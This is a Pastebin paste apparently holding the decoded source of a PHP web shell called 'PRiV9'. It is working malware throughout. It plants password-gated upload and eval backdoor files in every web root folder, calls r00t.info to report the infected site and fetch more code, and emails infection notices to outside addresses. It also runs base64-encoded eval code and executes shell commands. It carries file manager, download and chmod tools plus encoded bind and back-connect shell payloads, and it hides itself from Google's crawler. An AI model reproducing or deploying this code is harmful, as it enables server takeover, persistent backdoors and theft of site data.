Guest User

ATTACK SHELL PRiV9 belong to r00t.info fully decoded by 3H34N(nezami.me)

a guest
Aug 17th, 2020
215
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. ?><script src=hxxp://r00t.info/ccb.js></script>
  3. <?php @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('output_buffering',0); @set_time_limit(0); @set_magic_quotes_runtime(0); ?>
  4. <?php @session_start(); @error_reporting(0); $a = '<?php
  5. session_start();
  6. if($_SESSION["adm"]){
  7. echo \'<b>Namesis<br><br>\'.php_uname().\'<br></b>\';echo \'<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">\';echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\';if( $_POST[\'_upl\'] == "Upload" ) {   if(@copy($_FILES[\'file\'][\'tmp_name\'], $_FILES[\'file\'][\'name\'])) { echo \'<b>Upload Success !!!</b><br><br>\'; } else { echo \'<b>Upload Fail !!!</b><br><br>\'; }}
  8. }
  9. if($_POST["p"]){
  10. $p = $_POST["p"];
  11. $pa = md5(sha1($p));
  12. if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){
  13. $_SESSION["adm"] = 1;
  14. }
  15. }
  16. ?>
  17. <form action="" method="post">
  18. <input type="text" name="p">
  19. </form>
  20. '; if(@$_REQUEST["px"]){ $p = @$_REQUEST["px"]; $pa = md5(sha1($p)); if($pa=="a4cd2905b660e8b1bc73a7c4571252da"){ echo @eval(@file_get_contents(@$_REQUEST["404"])); } } if(@!$_SESSION["sdm"]){ $doc = $_SERVER["DOCUMENT_ROOT"]; $dir = scandir($doc); $d1 = ''.$doc.'/.'; $d2 = ''.$doc.'/..'; if(($key = @array_search('.', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search('..', $dir)) !== false) { unset($dir[$key]); } if(($key = @array_search($d1, $dir)) !== false) { unset($dir[$key]); } if(($key = array_search($d2, $dir)) !== false) { unset($dir[$key]); } @array_push($dir,$doc); foreach($dir as $d){ $p = $doc."/".$d; if(is_dir($p)){ $file = $p."/newsr.php"; @touch($file); $folder = @fopen($file,"w"); @fwrite($folder,$a); } } $lls = $_SERVER["hxxp_HOST"]; $llc = $_SERVER["REQUEST_URI"]; $lld = 'hxxp://'.$lls.''.$llc.''; $brow = urlencode($_SERVER['hxxp_USER_AGENT']); $retValue = file_get_contents(base64_decode("hxxp://r00t.info/yaz.php?a")."=".$lld.base64_decode("JmI=")."=".$brow); echo $retValue; @$_SESSION["sdm"]=1; } ?>
  21.  
  22.  
  23. <?php  if($_POST['query']){ $veriyfy = stripslashes(stripslashes($_POST['query'])); $data = "data.txt"; @touch ("data.txt"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $veriyfy ) ; @fclose ($ver); }else{ $datas=@fopen("data.txt",'r'); $i=0; while ($i <= 5) { $i++; $blue=@fgets($datas,1024); echo $blue; } } $datasi=@fopen("/modules/indexx.php",'r'); if($datasi){ }else{ @mkdir("modules"); $dos = file_get_contents("hxxp://r00t.info/txt/lamer.txt"); $data = "/modules/indexx.php"; @touch ("/modules/indexx.php"); $ver = @fopen ($data , 'w'); @fwrite ( $ver , $dos ) ; @fclose ($ver); $yol = "hxxp://".$_SERVER['hxxp_HOST']."".$_SERVER['REQUEST_URI'].""; $y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.$yol.'<br/>Sender Yolu : modules/dbs.php</h1>'; $header .= "From: SheLL Boot <suppor@nic.org>\n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("priphp@hotmail.com", "Hacklink Bildiri", "$y", $header); } ?><?php  $auth_pass = "39352d42823587e2152e181173b0972a"; $color = "#FF0000"; $default_action = 'FilesMan'; @define('SELF_PATH', __FILE__); if( strpos($_SERVER['hxxp_USER_AGENT'],'Google') !== false ) { header('hxxp/1.0 404 Not Found'); exit; } @session_start(); @error_reporting(0); @ini_set('error_log',NULL); @ini_set('log_errors',0); @ini_set('output_buffering',0); if(isset($_GET['dl']) && ($_GET['dl'] != "")){ $file = $_GET['dl']; $filez = @file_get_contents($file); header("Content-type: application/octet-stream"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file)."\";"); echo $filez; exit; } elseif(isset($_GET['dlgzip']) && ($_GET['dlgzip'] != "")){ $file = $_GET['dlgzip']; $filez = gzencode(@file_get_contents($file)); header("Content-Type:application/x-gzip\n"); header("Content-length: ".strlen($filez)); header("Content-disposition: attachment; filename=\"".basename($file).".gz\";"); echo $filez; exit; } if(isset($_GET['img'])){ @ob_clean(); $d = magicboom($_GET['y']); $f = $_GET['img']; $inf = @getimagesize($d.$f); $ext = explode($f,"."); $ext = $ext[count($ext)-1]; @header("Content-type: ".$inf["mime"]); @header("Cache-control: public"); @header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); @header("Cache-control: max-age=".(60*60*24*7)); @readfile($d.$f); exit; } $software = getenv("SERVER_SOFTWARE"); if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") $safemode = TRUE; else $safemode = FALSE; $system = @php_uname(); function showstat($stat) {if ($stat=="on") {return "<b><font style='color:#00FF00'>ON</font></b>";}else {return "<b><font style='color:#DD4736'>OFF</font></b>";}} function testmysql() {if (function_exists('mysql_connect')) {return showstat("on");}else {return showstat("off");}} function testcurl() {if (function_exists('curl_version')) {return showstat("on");}else {return showstat("off");}} function testwget() {if (exe('wget --help')) {return showstat("on");}else {return showstat("off");}} function testperl() {if (exe('perl -h')) {return showstat("on");}else {return showstat("off");}} if(strtolower(substr($system,0,3)) == "win") $win = TRUE; else $win = FALSE; if(isset($_GET['y'])){ if(@is_dir($_GET['view'])){ $pwd = $_GET['view']; @chdir($pwd); } else{ $pwd = $_GET['y']; @chdir($pwd); } } function convertByte($s) { if($s >= 1073741824) return sprintf('%1.2f',$s / 1073741824 ).' GB'; elseif($s >= 1048576) return sprintf('%1.2f',$s / 1048576 ) .' MB'; elseif($s >= 1024) return sprintf('%1.2f',$s / 1024 ) .' KB'; else return $s .' B'; } if(!$win){ if(!$user = rapih(exe("whoami"))) $user = ""; if(!$id = rapih(exe("id"))) $id = ""; $prompt = $user." \$ "; $pwd = @getcwd().DIRECTORY_SEPARATOR; } else { $user = @get_current_user(); $id = $user; $prompt = $user." &gt;"; $pwd = realpath(".")."\\"; $v = explode("\\",$d); $v = $v[0]; foreach (range("A","Z") as $letter) { $bool = @is_dir($letter.":\\"); if ($bool) { $letters .= "<a href=\"?y=".$letter.":\\\">[ "; if ($letter.":" != $v) {$letters .= $letter;} else {$letters .= "<span class=\"gaya\">".$letter."</span>";} $letters .= " ]</a> "; } } } function testoracle() { if (function_exists('ocilogon')) { return showstat("on"); } else { return showstat("off"); } } function testmssql() { if (function_exists('mssql_connect')) { return showstat("on"); } else { return showstat("off"); } } function showdisablefunctions() { if ($disablefunc=@ini_get("disable_functions")){ return "<span style='color:'><font color=#DD4736><b>".$disablefunc."</b></font></span>"; } else { return "<span style='color:#00FF1E'><b>NONE</b></span>"; } } if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $server_ip = @gethostbyname($_SERVER["hxxp_HOST"]); $my_ip = $_SERVER['REMOTE_ADDR']; $admin_id=$_SERVER['SERVER_ADMIN']; $bindport = "13123"; $bindport_pass = "b374k"; $pwds = explode(DIRECTORY_SEPARATOR,$pwd); $pwdurl = ""; for($i = 0 ; $i < sizeof($pwds)-1 ; $i++){ $pathz = ""; for($j = 0 ; $j <= $i ; $j++){ $pathz .= $pwds[$j].DIRECTORY_SEPARATOR; } $pwdurl .= "<a href=\"?y=".$pathz."\">".$pwds[$i]." ".DIRECTORY_SEPARATOR." </a>"; } if(isset($_POST['rename'])){ $old = $_POST['oldname']; $new = $_POST['newname']; @rename($pwd.$old,$pwd.$new); $file = $pwd.$new; } if(isset($_POST['chmod'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} if(isset($_POST['chmod_folder'])){ $name = $_POST['name']; $value = $_POST['newvalue']; if (strlen($value)==3){ $value = 0 . "" . $value;} @chmod($pwd.$name,octdec($value)); $file = $pwd.$name;} $buff = "Software : <b>".$software."</b><br />"; $buff .= "System OS : <b>".$system."</b><br />"; if($id != "") $buff .= "ID : <b>".$id."</b><br />"; $buff .= "PHP Version : <b>".phpversion()."</b> on <b>".php_sapi_name()."</b><br />"; $buff .= "Server ip : <b>".$server_ip."</b> <span class=\"gaya\"> | </span> Your   ip : <b>".$my_ip."</b><span class=\"gaya\"> | </span> Admin : <b>".$admin_id."</b><br />"; $buff .= "Free Disk: "."<span style='color:#00FF1E'><b>".convertByte(disk_free_space("/"))." / ".convertByte(disk_total_space("/"))."</b></span><br />"; if($safemode) $buff .= "Safemode: <span class=\"gaya\"><b>ON</b></span><br />"; else $buff .= "Safemode: <span class=\"gaya\"><b>OFF</b></span><br />"; $buff .= "Disabled Functions: ".showdisablefunctions()."<br />"; $buff .= "MySQL: ".testmysql()."&nbsp;|&nbsp;MSSQL: ".testmssql()."&nbsp;|&nbsp;Oracle: ".testoracle()."&nbsp;|&nbsp;Perl: ".testperl()."&nbsp;|&nbsp;cURL: ".testcurl()."&nbsp;|&nbsp;WGet: ".testwget()."<br>"; $buff .= "<font color=00ff00 ><b>".$letters."&nbsp;&gt;&nbsp;".$pwdurl."</b></font>"; $injbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjkgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiYW5hbGZhYmV0b3ZpcnR1YWxAZ21haWwuY29tIiwkanVkdWwsJGJvZHksJGF1dGhfcGFzcyk7IH0NCn0NCmVsc2UgeyAkdmlzaXRjKys7IH0NCkBzZXRjb29raWUoInZpc2l0eiIsJHZpc2l0Yyk7"; eval(base64_decode($injbuff)); function rapih($text){ return trim(str_replace("<br />","",$text)); } function magicboom($text){ if (!get_magic_quotes_gpc()) { return $text; } return stripslashes($text); } function showdir($pwd,$prompt){ $fname = array(); $dname = array(); if(function_exists("posix_getpwuid") && function_exists("posix_getgrgid")) $posix = TRUE; else $posix = FALSE; $user = "????:????"; if($dh = @scandir($pwd)){ foreach($dh as $file){ if(is_dir($file)){ $dname[] = $file; } elseif(is_file($file)){ $fname[] = $file; } } } else{ if($dh = @opendir($pwd)){ while($file = @readdir($dh)){ if(@is_dir($file)){ $dname[] = $file; } elseif(@is_file($file)){ $fname[] = $file; } } @closedir($dh); } } sort($fname); sort($dname); $path = @explode(DIRECTORY_SEPARATOR,$pwd); $tree = @sizeof($path); $parent = ""; $buff = "
  24.     <form action=\"?y=".$pwd."&amp;x=shell\" method=\"post\" style=\"margin:8px 0 0 0;\">
  25.     <table class=\"cmdbox\" style=\"width:50%;\">
  26.     <tr><td><b>$prompt</b></td><td><input onMouseOver=\"this.focus();\" id=\"cmd\" class=\"inputz\" type=\"text\" name=\"cmd\" style=\"width:400px;\" value=\"\" /><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  27.     </form>
  28.     <form action=\"?\" method=\"get\" style=\"margin:8px 0 0 0;\">
  29.     <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  30.     <tr><td><b>view file/folder</b></td><td><input onMouseOver=\"this.focus();\" id=\"goto\" class=\"inputz\" type=\"text\" name=\"view\" style=\"width:400px;\" value=\"".$pwd."\" /><input class=\"inputzbut\" type=\"submit\" value=\"View !\" name=\"submitcmd\" style=\"width:80px;\" /></td></tr>
  31.     </form></table><table class=\"explore\">
  32.     <tr><th>name</th><th style=\"width:80px;\">size</th><th style=\"width:210px;\">owner:group</th><th style=\"width:80px;\">perms</th><th style=\"width:110px;\">modified</th><th style=\"width:190px;\">actions</th></tr>
  33.     "; if($tree > 2) for($i=0;$i<$tree-2;$i++) $parent .= $path[$i].DIRECTORY_SEPARATOR; else $parent = $pwd; foreach($dname as $folder){ if($folder == ".") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$pwd."\">$folder</a></td><td>LINK</td>
  34.             <td style=\"text-align:center;\">".$owner."</td><td><center>".get_perms($pwd)."</center></td>
  35.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($pwd))."</td><td><span id=\"titik1\">
  36.             <a href=\"?y=$pwd&amp;edit=".$pwd."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik1','titik1_form');\">newfolder</a></span>
  37.             <form action=\"?\" method=\"get\" id=\"titik1_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  38.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  39.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  40.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  41.             </form></td>
  42.            
  43.             </tr>
  44.             "; } elseif($folder == "..") { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a href=\"?y=".$parent."\"><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAAN1gAADdYBkG95nAAAAAd0SU1FB9oJBxUAM0qLz6wAAALLSURBVDjLbVPRS1NRGP+d3btrs7kZmAYXlSZYUK4HQXCREPWUQSSYID1GEKKx/Af25lM+DCFCe4heygcNdIUEST04QW6BjS0yx5UhkW6FEtvOPfc7p4emXcofHPg453y/73e+73cADyzLOoy/bHzR8/l80LbtYD5v6wf72VzOmwLmTe7u7oZlWccbGhpGNJ92HQwtteNvSqmXJOWjM52dPPMpg/Nd5/8SpFIp9Pf3w7KsS4FA4BljrB1HQCmVc4V7O3oh+mFlZQWxWAwskUggkUhgeXk5Fg6HF5mPnWCAAhhTUGCKQUF5eb4LIa729PRknr94/kfBwMDAsXg8/tHv958FoDxP88YeJTLd2xuLAYAPAIaGhu5IKc9yzsE5Z47jYHV19UOpVNoXQsC7OOdwHNG7tLR0EwD0UCis67p2nXMOACiXK7/ev3/3ZHJy8nEymZwyDMM8qExEyjTN9vr6+oAQ4gaAef3ixVgd584pw+DY3d0tTE9Pj6TT6TfBYJCPj4/fBuA/IBBC+GZmZhZbWlrOOY5jDg8Pa3qpVEKlUoHf70cgEGgeHR2NPHgQV4ODt9Ts7KwEQACgaRpSqVdQSrFqtYpqtSpt2wYDYExMTMy3tbVdk1LWpqXebm1t3TdN86mu65FaMw+sE2KM6T9//pgaGxsb1QE4a2trr5uamq55Gn2l+WRzWgihEVH9EX5AJpOZBwANAHK5XKGjo6OvsbHRdF0XRAQpZZ2U0k9EiogYEYGIlJSS2bY9m0wmHwJQWo301/b2diESiVw2jLoQETFyXeWSy4hc5rqHJKxYLGbn5ubuFovF0qECANjf37e/bmzkjDrjdCgUamU+MCIJIgkpiZXLZZnNZhcWFhbubW5ufu7q6sLOzs7/LgPQ3tra2h+NRvvC4fApAHJvb29rfX19qVAovAawd+Rv/Ac+AMcAGLUJVAA4R138DeF+cX+xR/AGAAAAAElFTkSuQmCC'>   $folder</a></td><td>LINK</td>
  45.             <td style=\"text-align:center;\">".$owner."</td>
  46.             <td><center>".get_perms($parent)."</center></td><td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($parent))."</td>
  47.             <td><span id=\"titik2\"><a href=\"?y=$pwd&amp;edit=".$parent."newfile.php\">newfile</a> | <a href=\"javascript:tukar('titik2','titik2_form');\">newfolder</a></span>
  48.             <form action=\"?\" method=\"get\" id=\"titik2_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  49.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  50.             <input class=\"inputz\" style=\"width:140px;\" type=\"text\" name=\"mkdir\" value=\"a_new_folder\" />
  51.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" style=\"width:35px;\" value=\"Go !\" />
  52.             </form>
  53.             </td></tr>"; } else { if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($folder)."_link\" href=\"?y=".$pwd.$folder.DIRECTORY_SEPARATOR."\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAQAAAC1+jfqAAAAAXNSR0IArs4c6QAAAAJiS0dEAP+Hj8y/AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA00lEQVQoz6WRvUpDURCEvzmuwR8s8gr2ETvtLSRaKj6ArZU+VVAEwSqvJIhIwiX33nPO2IgayK2cbtmZWT4W/iv9HeacA697NQRY281Fr0du1hJPt90D+xgc6fnwXjC79JWyQdiTfOrf4nk/jZf0cVenIpEQImGjQsVod2cryvH4TEZC30kLjME+KUdRl24ZDQBkryIvtOJggLGri+hbdXgd90e9++hz6rR5jYtzZKsIDzhwFDTQDzZEsTz8CRO5pmVqB240ucRbM7kejTcalBfvn195EV+EajF1hgAAAABJRU5ErkJggg==' />     [ $folder ]</b></a>
  54.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  55.             <input type=\"hidden\" name=\"oldname\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  56.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$folder."\" />
  57.             <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  58.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($folder)."_form','".clearspace($folder)."_link');\" />
  59.             </form><td>DIR</td><td style=\"text-align:center;\">".$owner."</td>
  60.             <td><center>
  61.             <a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\">".get_perms($pwd.$folder)."</a>
  62.             <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($folder)."_form3\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  63.             <input type=\"hidden\" name=\"name\" value=\"".$folder."\" style=\"margin:0;padding:0;\" />
  64.             <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($pwd.$folder)), -4)."\" />
  65.             <input class=\"inputzbut\" type=\"submit\" name=\"chmod_folder\" value=\"chmod\" />
  66.             <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\"
  67.             onclick=\"tukar('".clearspace($folder)."_link','".clearspace($folder)."_form3');\" /></form></center></td>
  68.             <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($folder))."</td><td><a href=\"javascript:tukar('".clearspace($folder)."_link','".clearspace($folder)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;fdelete=".$pwd.$folder."\">delete</a></td></tr>"; } } foreach($fname as $file){ $full = $pwd.$file; if(!$win && $posix){ $name=@posix_getpwuid(@fileowner($folder)); $group=@posix_getgrgid(@filegroup($folder)); $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name']; } else { $owner = $user; } $buff .= "<tr><td><a id=\"".clearspace($file)."_link\" href=\"?y=$pwd&amp;view=$full\"><b><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII=' />   $file</b></a>
  69.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  70.         <input type=\"hidden\" name=\"oldname\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  71.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$file."\" />
  72.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  73.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form');\" />
  74.         </form></td><td>".ukuran($full)."</td><td style=\"text-align:center;\">".$owner."</td><td><center>
  75.         <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\">".get_perms($full)."</a>
  76.         <form action=\"?y=$pwd\" method=\"post\" id=\"".clearspace($file)."_form2\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  77. <input type=\"hidden\" name=\"name\" value=\"".$file."\" style=\"margin:0;padding:0;\" />
  78. <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newvalue\" value=\"".substr(sprintf('%o', fileperms($full)), -4)."\" />
  79. <input class=\"inputzbut\" type=\"submit\" name=\"chmod\" value=\"chmod\" />
  80. <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($file)."_link','".clearspace($file)."_form2');\" /></form></center></td>
  81.         <td style=\"text-align:center;\">".date("d-M-Y H:i",@filemtime($full))."</td>
  82.         <td><a href=\"?y=$pwd&amp;edit=$full\">edit</a> | <a href=\"javascript:tukar('".clearspace($file)."_link','".clearspace($file)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$full\">delete</a> | <a href=\"?y=$pwd&amp;dl=$full\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$full\">gzip</a>)</td></tr>"; } $buff .= "</table>"; return $buff; } function ukuran($file){ if($size = @filesize($file)){ if($size <= 1024) return $size; else{ if($size <= 1024*1024) { $size = @round($size / 1024,2);; return "$size kb"; } else { $size = @round($size / 1024 / 1024,2); return "$size mb"; } } } else return "???"; } function exe($cmd){ if(function_exists('system')) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('exec')) { @exec($cmd,$results); $buff = ""; foreach($results as $result){ $buff .= $result; } return $buff; } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists('shell_exec')){ $buff = @shell_exec($cmd); return $buff; } } function tulis($file,$text){ $textz = gzinflate(base64_decode($text)); if($filez = @fopen($file,"w")) { @fputs($filez,$textz); @fclose($file); } } function ambil($link,$file) { if($fp = @fopen($link,"r")){ while(!feof($fp)) { $cont.= @fread($fp,1024); } @fclose($fp); $fp2 = @fopen($file,"w"); @fwrite($fp2,$cont); @fclose($fp2); } } function which($pr){ $path = exe("which $pr"); if(!empty($path)) { return trim($path); } else { return trim($pr); } } function download($cmd,$url){ $namafile = basename($url); switch($cmd) { case 'wwget': exe(which('wget')." ".$url." -O ".$namafile);break; case 'wlynx': exe(which('lynx')." -source ".$url." > ".$namafile);break; case 'wfread' : ambil($wurl,$namafile);break; case 'wfetch' : exe(which('fetch')." -o ".$namafile." -p ".$url);break; case 'wlinks' : exe(which('links')." -source ".$url." > ".$namafile);break; case 'wget' : exe(which('GET')." ".$url." > ".$namafile);break; case 'wcurl' : exe(which('curl')." ".$url." -o ".$namafile);break; default: break; } return $namafile; } function get_perms($file) { if($mode=@fileperms($file)){ $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } else return "??????????"; } function clearspace($text){ return str_replace(" ","_",$text); } $port_bind_bd_c="bVNhb9owEP2OxH+4phI4NINAN00aYxJaW6maxqbSLxNDKDiXxiLYkW3KGOp/3zlOpo7xIY793jvf
  83. +fl8KSQvdinCR2NTofr5p3br8hWmhXw6BQ9mYA8lmjO4UXyD9oSQaAV9AyFPCNRa+pRCWtgmQrJE
  84. P/GIhufQg249brd4nmjo9RxBqyNAuwWOdvmyNAKJ+ywlBirhepctruOlW9MJdtzrkjTVKyFB41ZZ
  85. dKTIWKb0hoUwmUAcwtFt6+m+EXKVJVtRHGAC07vV/ez2cfwvXSpticytkoYlVglX/fNiuAzDE6VL
  86. 3TfVrw4o2P1senPzsJrOfoRjl9cfhWjvIatzRvNvn7+s5o8Pt9OvURzWZV94dQgleag0C3wQVKug
  87. Uq2FTFnjDzvxAXphx9cXQfxr6PcthLEo/8a8q8B9LgpkQ7oOgKMbvNeThHMsbSOO69IA0l05YpXk
  88. HDT8HxrV0F4LizUWfE+M2SudfgiiYbONxiStebrgyIjfqDJG07AWiAzYBc9LivU3MVpGFV2x1J4W
  89. tyxAnivYY8HVFsEqWF+/f7sBk2NRQKcDA/JtsE5MDm9EUG+MhcFqkpX0HmxGbqbkdBTMldaHRsUL
  90. ZeoDeOSFBvpefCfXhflOpgTkvJ+jtKiR7vLohYKCqS2ZmMRj4Z5gQZfSiMbi6iqkdnHarEEXYuk6
  91. uPtTdumsr0HC4q5rrzNifV7sC3ZWUmq+LVlVa5OfQjTanZYQO+Uf"; $port_bind_bd_pl="ZZJhT8IwEIa/k/AfjklgS2aA+BFmJDB1cW5kHSZGzTK2Qxpmu2wlYoD/bruBIfitd33uvXuvvWr1
  92. NmXRW1DWy7HImo02ebRd19Kq1CIuV3BNtWGzQZeg342DhxcYwcCAHeCWCn1gDOEgi1yHhLYXzfwg
  93. tNqKeut/yKJNiUB4skYhg3ZecMETnlmfKKrz4ofFX6h3RZJ3DUmUFaoTszO7jxzPDs0O8SdPEQkD
  94. e/xs/gkYsN9DShG0ScwEJAXGAqGufmdq2hKFCnmu1IjvRkpH6hE/Cuw5scfTaWAOVE9pM5WMouM0
  95. LSLK9HM3puMpNhp7r8ZFW54jg5wXx5YZLQUyKXVzwdUXZ+T3imYoV9ds7JqNOElQTjnxPc8kRrVo
  96. vaW3c5paS16sjZo6qTEuQKU1UO/RSnFJGaagcFVbjUTCqeOZ2qijNLWzrD8PTe32X9oOgvM0bjGB
  97. +hecfOQFlT4UcLSkmI1ceY3VrpKMy9dWUCVCBfTlQX6Owy8="; $back_connect="fZFRS8MwFIXfB/sPWSw2hUrnqyPC0CpD3KStvqh0XRpcsE1KkoKF/XiTtCIV6tu55+Z89yY5W0St
  98. ktGB8aihsprPWkVBKsgn1av5zCN1iQGsOv4Fbak6pWmNgU/JUQC4b3lRU3BR7OFqcFhptMOpo28j
  99. S2whVulCflCNvXVy//K6fLdWI+SPcekMVpSlxIxTnRdacDSEAnA6gZJRBGMphbwC3uKNw8AhXEKZ
